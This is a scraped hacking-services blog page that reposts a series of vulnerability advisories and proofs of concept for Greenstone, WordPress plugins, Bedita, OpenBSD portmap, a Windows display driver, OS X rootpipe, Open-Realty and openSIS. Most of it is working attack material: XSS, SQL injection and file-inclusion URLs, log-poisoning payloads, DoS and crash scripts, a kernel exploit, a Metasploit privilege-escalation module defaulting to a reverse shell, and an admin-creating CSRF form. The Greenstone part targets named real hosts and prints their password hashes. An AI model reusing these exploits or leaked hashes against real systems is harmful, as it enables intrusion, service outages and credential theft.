Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863158124

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/56662/info

Greenstone is prone to the following security vulnerabilities:

1. A file-disclosure vulnerability
2. A cross-site scripting vulnerability
3. A security weakness
4. A security-bypass vulnerability

Attackers can exploit these issues to view local files, bypass certain security restriction, steal cookie-based authentication, or execute arbitrary scripts in the context of the browser. 

=================Let's Roll============================


Password  file disclosure:

http://greenstone.flib.sci.am/gsdl/etc/users.gdb
http://greenstone.flib.sci.am/gsdl/etc/key.gdb
http://greenstone.martinique.univ-ag.fr/gsdl/etc/users.db
http://greenstone.martinique.univ-ag.fr/gsdl/etc/key.db

Example:
(P.S Password encryption: Des (Unix))
===================== Reproduce =====================
$ wget http://greenstone.flib.sci.am/gsdl/etc/users.gdb && cat users.gdb
--2012-11-22 17:04:39--  http://greenstone.flib.sci.am/gsdl/etc/users.gdb
Resolving greenstone.flib.sci.am (greenstone.flib.sci.am)... 93.187.162.197
Connecting to greenstone.flib.sci.am (greenstone.flib.sci.am)|93.187.162.197|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12926 (13K) [text/plain]
Saving to: `users.gdb'

100%[==========================================>] 12,926      31.8K/s   in 0.4s

2012-11-22 17:04:40 (31.8 KB/s) - `users.gdb' saved [12926/12926]
.......Some junk snip........
...                                admin<comment>created at install time
<enabled>true
<groups>administrator,colbuilder,all-collections-editor
<password>TpM5gyFpfCsLc
<username>admindemo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>Tpp90HTz/jz9w
<username>demotatevik<comment>
<enabled>true
<groups>all-collections-editor
<password>Tpyq8s1oUIioc
<username>tatevik
azgayin<comment>
<enabled>true
<groups>all-collections-editor
<password>Tp53Vsj1qM4cE
<username>azgayin
demo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>TpzWMQXVfKFvw
<username>demo

========================= END OF users.gbd============================


Known salt issuse (because this application uses "setpasswd" utility via 
hardcoded salt=>: Tp)
(Especially on windows systems)



================================BEGIN================================
/**********************************************************************
 *
 * setpasswd.cpp -- 
 * Copyright (C) 2000  The New Zealand Digital Library Project
 *
 * A component of the Greenstone digital library software
 * from the New Zealand Digital Library Project at the
 * University of Waikato, New Zealand.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
 *********************************************************************/

// setpasswd is a windows application that can be used to encrypt a password
// and write it (along with its corresponding username) to a gdbm database.

// it handles writing to the gdbm database itself to avoid having to call
// the txt2db console application (and therefore avoiding the console
// window popping up when called from another windows application).

// note that setpasswd does no checking to make sure that any of it's
// input arguments are valid (or even reasonable) values.

// this program should be compiled into a binary called setpw.exe (to be
// short enough not to mess with 16 bit Windows platforms).

// usage:
// setpw -u username -p password -o output_gdbm_file

#include "text_t.h"
#include "crypt.h"
#include "autoconf.h"
#include "systems.h"
#include "gdbmconst.h"
#include "gdbm.h"

#include <windows.h>

text_t username;
text_t password;
text_t output_gdbm_file;

bool parse_cmdline (LPSTR cmdline) {

  bool in_quote = false;
  text_t arg;
  text_tarray args;
  unsigned char *c = (unsigned char *)cmdline;
  while (*c != '\0') {
    if (*c == '"') {
      if (!in_quote) {
  in_quote = true;
      } else {
  in_quote = false;
  if (!arg.empty()) args.push_back (arg);
  arg.clear();
      }
    } else if (*c == ' ' && !in_quote) {
      if (!arg.empty()) args.push_back (arg);
      arg.clear();
    } else {
      arg.push_back (*c);
    }
    ++c;
  }
  if (!arg.empty()) args.push_back (arg);
  
  text_tarray::const_iterator here = args.begin();
  text_tarray::const_iterator end = args.end();
  while (here != end) {
    if (*here == "-u" && (++here != end)) username = *here;
    else if (*here == "-p" && (++here != end)) password = *here;
    else if (*here == "-o" && (++here != end)) output_gdbm_file = *here;
    if (here != end) ++here;
  }
  if (username.empty() || password.empty() || output_gdbm_file.empty()) {
    MessageBox (NULL, "Usage:\n setpasswd -u username -p password -o output_gdbm_file", 
    "setpasswd failed", MB_OK);
    return false;
  }
  return true;
}

text_t crypt_text (const text_t &text) {
  static const char *salt = "Tp";
  text_t crypt_password;

  if (text.empty()) return "";

  // encrypt the password
  char *text_cstr = text.getcstr();
  if (text_cstr == NULL) return "";
  crypt_password = crypt(text_cstr, salt);
  delete []text_cstr;

  return crypt_password;
}

bool add_to_db () {

  int block_size = 0;
  GDBM_FILE dbf;
  char *dbname = output_gdbm_file.getcstr();

  // open the database
  int read_write = GDBM_WRCREAT;
  dbf = gdbm_open (dbname, block_size, read_write, 00664, NULL, 1);
  if (dbf == NULL) {
    MessageBox (NULL, "gdbm_open failed\n", "setpasswd", MB_OK);
    return false;
  }

  datum key_data;
  key_data.dptr = username.getcstr();
  if (key_data.dptr == NULL) {
    MessageBox (NULL, "null key_data\n", "setpasswd", MB_OK);
    return false;
  }
  key_data.dsize = strlen(key_data.dptr);

  text_t value = "<comment>\n";
  value += "<enabled>true\n";
  value += "<groups>administrator,colbuilder\n";
  value += "<password>" + password + "\n";
  value += "<username>" + username + "\n";
      
  datum value_data;
  value_data.dptr = value.getcstr();
  if (value_data.dptr == NULL) {
    MessageBox (NULL, "null value_data\n", "setpasswd", MB_OK);
    return false;
  }
  value_data.dsize = strlen(value_data.dptr);
      
  // store the value
  if (gdbm_store (dbf, key_data, value_data, GDBM_REPLACE) < 0) {
    MessageBox (NULL, "gdbm_store failed\n", "setpasswd", MB_OK);
    return false;
  }
  gdbm_close (dbf);

  delete []key_data.dptr;
  delete []value_data.dptr;
  delete []dbname;
  return true;
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine, int nCmdShow) {

  // parse command line arguments
  if (!parse_cmdline (lpCmdLine)) return 1;

  // encrypt the password
  password = crypt_text (password);

  // append the password and username to database
  add_to_db();
  
  return 0;
}

============================================================

XSS:

site.tld/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=<script>alert("OwnEd");</script>
Demo: 
http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E

http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E%20%3E%3E%20greenstone.flib.greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E

http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E&pr=7&c=AkaStep


============================================================



Log forging:

http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223"%0D%0A%0D%0AWarning: Accepted connection from unknown host to local port: 22 root logged in%29%0D%0A%0D%0A" cmd.exe


http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223%0D%0A%0D%0AError%20D:\Program%20Files\Greenstone\%20directory%20owned?%29%0D%0A%0D%0A


Forged log:  http://greenstone.unam.na/gsdl/etc/error.txt              (CTRL+F and search for:  host to local port: 22)

Example:

===================EXAMPLE OF =FORGED LOG====================
Error: the action "4?e="3"



Warning: Accepted connection from unknown host to local port: 22 root logged in)          <==Fake entry for Panic system administrator))))))



" cmd.exe" could not be found.

================END OF FORGED LOG=============

Log File Poisoning: (Usefull for LFI)
www.bibliotecamuseodelamemoria.cl/gsdl/cgi-bin/library.cgi?e=4?e="%0d%0a<?php phpinfo();?>%0d%0a%00%00

Poisoned Log can be found in the following places: 
site/gsdl/etc/error.txt
or 
site/etc/error.txt              (<=On Windows systems in ex i found it here)




Example of injected log:
==================================

http://greenstone.unam.na/gsdl/etc/error.txt


Error: the action "4?e="

<?php phpinfo();?>

.." could not be found.
==================================

******************** The End *******************
HireHackking 
source: https://www.securityfocus.com/bid/56663/info

The Zarzadzonie Kontem plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

http://www.example.com/wp-content/plugins/zarzadzanie_kontem/js/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
HireHackking 
########################################################################################

# Title: Bedita 3.5.1 XSS vulnerabilites 
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications

########################################################################################

===================
Introduction:
===================

BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.

(http://en.wikipedia.org/wiki/BEdita)

########################################################################################

===================
Report Timeline:
===================

2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release


########################################################################################

===================
Technical details:
===================


Persistent XSS:
===============

Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.


Exploits Examples:


1)cfg[projectName] parameter:

 	POST http://127.0.0.1/bedita/index.php/admin/saveConfig 
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]


2) data[stats_provider_url] parameter:

 	POST http://127.0.0.1/bedita/index.php/areas/saveArea
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]


3) data[description] parameter:

	POST http://127.0.0.1/bedita/index.php/areas/saveSection
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bdescription%5D=&lt;/textarea&gt;<script>alert(123)</script>[...]

########################################################################################
HireHackking 
# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
# Date: 8/31/2015
# Exploit Author: j2x6
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
# Version: 1.1.0.8
# Tested on: Windows 7
# Offset for Buffer Overflow attempt: 495

#!/usr/bin/python

import socket

badthing= "A" * 81300

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.45.11',21))
s.send(badthing+'\r\n')
s.send(badthing+'\r\n')
s.send('\r\n')
s.send('EXIT\r\n')
s.close()
HireHackking
******************************************************************************************** # Exploit Title: Mpxplay Multimedia Commander Stack-based BOF # Date: 9/1/2015 # Exploit Author: Un_N0n # Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity # Version: V2.00a # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- open 'mpxp_mmc.exe'. 2- Browser Crash.m3u in audio player. ~ Software will Crash. [Code to produce crash.txt]: junk = "A"*66666 file = open("CRASH.m3u",'w') file.write(junk) file.close() **********************************************************************************************
HireHackking
KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-004 Publication Date: 2015.09.01 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt 1. Vulnerability Details Affected Vendor: Silicon Integrated Systems Corporation Affected Product: XGI VGA Display Manager Affected Version: 6.14.10.1090 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-5466 2. Vulnerability Description A vulnerability within the xrvkp module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege. 3. Technical Description Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 50, {ffff0000, 1, 804f3b76, 0} Probably caused by : xrvkp.sys ( xrvkp+6ec ) Followup: MachineOwner --------- kd> kn Call stack: # ChildEBP RetAddr 00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b 01 f63fda00 805405d4 nt!MmAccessFault+0x8e7 02 f63fda00 804f3b76 nt!KiTrap0E+0xcc 03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92 04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3 05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5 06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11 07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b 08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8 09 f63fdc34 804ee129 xrvkp+0x6ec 0a f63fdc44 80574e56 nt!IopfCallDriver+0x31 0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70 0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7 0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8 0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 15 0021f6c0 1e07bd9c _ctypes+0x54d8 16 00000000 00000000 python27!PyObject_Call+0x4c 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2015.05.14 - Initial contact; requested security contact. 2015.05.18 - Second contact attempt. 2015.05.25 - Third contact attempt. 2015.07.02 - KoreLogic requests CVE from Mitre. 2015.07.10 - Mitre issues CVE-2015-5466. 2015.07.28 - 45 business days have elapsed since KoreLogic last attempted to contact SiS without a response. 2015.09.01 - Public disclosure. 7. Proof of Concept from sys import exit from ctypes import * NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory WriteProcessMemory = windll.kernel32.WriteProcessMemory DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None device = "xgikp" code = 0x96002404 inlen = 0xe6b6 outlen = 0x0 inbuf = 0x1 outbuf = 0xffff0000 inBufMem = "\x90"*inlen def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0))) DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen) CloseHandle(handle) return False if __name__=="__main__": main() The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
HireHackking

WordPress Theme Magazine Basic - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56664/info The Magazine Basic theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/themes/magazine-basic/view_artist.php?id=[SQL]
HireHackking

WordPress Plugin Ads Box - 'count' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56681/info The Ads Box plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/plugins/ads-box/iframe_ampl.php?count=[SQLi]
HireHackking

OpenBSD 4.x - Portmap Remote Denial of Service

HACKER · %s · %s

// source: https://www.securityfocus.com/bid/56671/info OpenBSD is prone to a remote denial-of-service vulnerability. Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions. OpenBSD versions prior to 5.2 are vulnerable. /* * authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466 * 6e2d3d47576f746e9e65cb4d7f3aaa1519971189 * c8e74ebd8392fda4788179f9a02bb49337638e7b * * greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf * e4c0f3f28cf322779375b71f1c14d6f8308f789d * 691cb088c45ec9e31823ca7ab0da8b4cf8079baf * b234a149e7ef00abc0f2ec7e6cf535ef4872eabc * * * -bash-4.2$ uname -a * OpenBSD obsd.my.domain 5.1 GENERIC#160 i386 * -bash-4.2$ id * uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) * -bash-4.2$ netstat -an -f inet | grep 111 * tcp 0 0 127.0.0.1.111 *.* LISTEN * tcp 0 0 *.111 *.* LISTEN * udp 0 0 127.0.0.1.111 *.* * udp 0 0 *.111 *.* * -bash-4.2$ gcc openbsd_libc_portmap.c * -bash-4.2$ ./a.out * [+] This code doesn't deserve 1337 status output. * [+] Trying to crash portmap on 127.0.0.1:111 * [+] 127.0.0.1:111 is now down. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #define HOST "127.0.0.1" #define PORT 111 #define LOOP 0x100 int main(void) { int s, i; struct sockaddr_in saddr; printf("[+] This code doesn't deserve 1337 status output.\n"); printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT); saddr.sin_family = AF_INET; saddr.sin_port = htons(PORT); saddr.sin_addr.s_addr = inet_addr(HOST); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) { printf("[-] %s:%d is already down.\n", HOST, PORT); return EXIT_FAILURE; } /* # of iteration needed varies but starts working for > 0x30 */ for(i=0; i < LOOP; ++i) { s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)); send(s, "8========@", 10, 0); } if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) printf("[+] %s:%d is now down.\n", HOST, PORT); else printf("[-] %s:%d is still listening. Try to increase loop iterations...\n"); return EXIT_SUCCESS; }
HireHackking

WordPress Theme Wp-ImageZoom - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56691/info The Wp-ImageZoom theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL]
HireHackking
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Apple OS X Entitlements Rootpipe Privilege Escalation', 'Description' => %q{ This module exploits the rootpipe vulnerability and bypasses Apple's initial fix for the issue by injecting code into a process with the 'admin.writeconfig' entitlement. }, 'Author' => [ 'Emil Kvarnhammar', # Vulnerability discovery and PoC 'joev' # Copy/paste monkey ], 'References' => [ ['CVE', '2015-3673'], ['URL', 'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/'] ], 'DisclosureDate' => 'Jul 1 2015', 'License' => MSF_LICENSE, 'Platform' => 'osx', 'Arch' => ARCH_X86_64, 'SessionTypes' => ['shell'], 'Privileged' => true, 'Targets' => [ ['Mac OS X 10.9-10.10.3', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp', 'PrependSetreuid' => true } )) register_options([ OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes']) ]) end def check if ver? && admin? vprint_status("Version is between 10.9 and 10.10.3, and is admin.") return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit print_status("Copying Directory Utility.app to #{new_app}") cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'") cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'") print_status("Writing bundle plist to `#{plist_file}'") write_file(plist_file, plist) print_status("Writing payload to `#{payload_file}'") write_file(payload_file, binary_payload) register_file_for_cleanup(payload_file) print_status("Writing malicious shared library to `#{exploit_file}'") write_file(exploit_file, plugin_exploit) print_status("Running Directory Utility.app") cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'") print_status("Deleting Directory Utility.app") cmd_exec('rm -Rf "#{new_app}"') print_status('Executing payload...') cmd_exec("/bin/sh -c '#{root_file} &'") end def ver? Gem::Version.new(get_sysinfo['ProductVersion']).between?( Gem::Version.new('10.9'), Gem::Version.new('10.10.3') ) end def admin? cmd_exec('groups | grep -wq admin && echo true') == 'true' end def sploit "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}" end def plugin_exploit File.read(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug' )) end def binary_payload Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) end def exploit_file "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle" end def plist_file "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist" end def new_app @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app" end def plist %Q| <?xml version="1.0" encoding="UTF-8"?> <plist version="1.0"> <dict> <key>CFBundleGetInfoString</key> <string>RootpipeBundle</string> <key>CFBundleExecutable</key> <string>RootpipeBundle</string> <key>CFBundleIdentifier</key> <string>com.root.pipe</string> <key>CFBundleName</key> <string>RootpipeBundle</string> <key>CFBundleShortVersionString</key> <string>0.01</string> <key>CFBundleInfoDictionaryVersion</key> <string>6.0</string> <key>CFBundlePackageType</key> <string>APPL</string> <key>IFMajorVersion</key> <integer>0</integer> <key>IFMinorVersion</key> <integer>1</integer> </dict> </plist> | end def payload_file @payload_file ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}" end def root_file @root_file ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}" end end
HireHackking

Open-Realty 2.5.8 - Cross-Site Request Forgery

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56580/info Open-Realty is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions and gain access to the affected application. Other attacks are also possible. Open-Realty 2.5.8 and prior versions are vulnerable; other versions may also be affected. <!-- Add Admin User --> <form action="http://localhost/orealty/admin/index.php?action=user_manager" method="POST"> <input type="hidden" name="action" value="createNewUser" /> <input type="hidden" name="edit&#95;user&#95;name" value="user" /> <input type="hidden" name="edit&#95;user&#95;pass" value="pa55w0rd" /> <input type="hidden" name="edit&#95;user&#95;pass2" value="pa55w0rd" /> <input type="hidden" name="user&#95;first&#95;name" value="hacker" /> <input type="hidden" name="user&#95;last&#95;name" value="smith" /> <input type="hidden" name="user&#95;email" value="hacker&#64;yehg&#46;net" /> <input type="hidden" name="edit&#95;active" value="yes" /> <input type="hidden" name="edit&#95;isAdmin" value="yes" /> <input type="hidden" name="edit&#95;isAgent" value="yes" /> <input type="hidden" name="limitListings" value="&#45;1" /> <input type="hidden" name="edit&#95;limitFeaturedListings" value="&#45;1" /> <input type="hidden" name="edit&#95;userRank" value="0" /> <input type="hidden" name="edit&#95;canEditAllListings" value="yes" /> <input type="hidden" name="edit&#95;canEditAllUsers" value="yes" /> <input type="hidden" name="edit&#95;canEditSiteConfig" value="yes" /> <input type="hidden" name="edit&#95;canEditMemberTemplate" value="yes" /> <input type="hidden" name="edit&#95;canEditAgentTemplate" value="yes" /> <input type="hidden" name="edit&#95;canEditPropertyClasses" value="yes" /> <input type="hidden" name="edit&#95;canEditListingTemplate" value="yes" /> <input type="hidden" name="edit&#95;canViewLogs" value="yes" /> <input type="hidden" name="edit&#95;canModerate" value="yes" /> <input type="hidden" name="edit&#95;canFeatureListings" value="yes" /> <input type="hidden" name="edit&#95;canEditListingExpiration" value="yes" /> <input type="hidden" name="edit&#95;canExportListings" value="no" /> <input type="hidden" name="edit&#95;canPages" value="yes" /> <input type="hidden" name="edit&#95;canVtour" value="yes" /> <input type="hidden" name="edit&#95;canFiles" value="yes" /> <input type="hidden" name="edit&#95;canUserFiles" value="yes" /> <input type="hidden" name="edit&#95;canManageAddons" value="yes" /> <script>document.forms[0].submit()</script> </form>
HireHackking

WordPress Theme Madebymilk - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56608/info The Madebymilk theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. https://www.example.com/wp-content/plugins/madebymilk/voting-popup.php?id=null'
HireHackking

openSIS 5.1 - 'ajax.php' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56598/info openSIS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. openSIS 5.1 is vulnerable; other versions may also be affected. http://www.example.com/opensis5.1/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
HireHackking

Feng Office - Security Bypass / HTML Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56626/info Feng Office is prone to a security-bypass vulnerability and an HTML-injection vulnerability. An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application. Feng Office 2.2.1 and 2.0 Beta 3 are vulnerable; other versions may also be affected. # Expl0it/P0c/Xss ################### <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> # Expl0it/P0c/Privilege Escalation ################### <input type="hidden" value="" name="contact[new_contact_from_mail_div_id]"> <input type="hidden" value="" name="contact[hf_contacts]"> <label for="og_1353469580_283914profileFormFirstName">First name: <input type="text" value="poc" 